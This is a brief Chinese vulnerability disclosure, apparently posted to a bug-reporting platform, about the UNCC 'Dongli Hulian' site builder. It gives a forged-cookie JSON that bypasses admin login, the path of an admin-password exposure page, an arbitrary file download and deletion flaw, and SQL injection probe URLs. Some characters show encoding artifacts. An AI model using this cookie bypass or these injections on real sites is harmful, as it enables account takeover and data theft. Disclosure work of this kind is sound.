簡要描述:
UNCC動力互聯(lián)建站存在多種高危漏洞,基本通殺所有程序,
動力互聯(lián)建站漏洞漏洞預(yù)警
。(這次報個禮包求邀請碼)
詳細(xì)說明:
后臺入口:
/manage/login.aspx
偽造cookie即可繞過登陸
[{ "domain": ".xxx.com", "expirationDate": 1392975480, "hostOnly": false, "httpOnly": false, "name": "AdminID", "path": "/", "secure": false, "session": false, "storeId": "0", "value": "1"},{ "domain": ".xxx.com", "expirationDate": 1392975480, "hostOnly": false, "httpOnly": false, "name": "AdminName", "path": "/", "secure": false, "session": false, "storeId": "0", "value": "admin"}]
爆管理員賬戶密碼:
/manage/admins.aspx
任意文件下載/刪除:
期刊下載-添加下載文檔 (刪除此條目會同時刪掉所指向文件)
SQL注入:
/manage/EditAdmin.aspx?ID=1'
/manage/EditAdmin.aspx?ID=1 and 1=1
漏洞證明:
修復(fù)方案:
過濾,驗證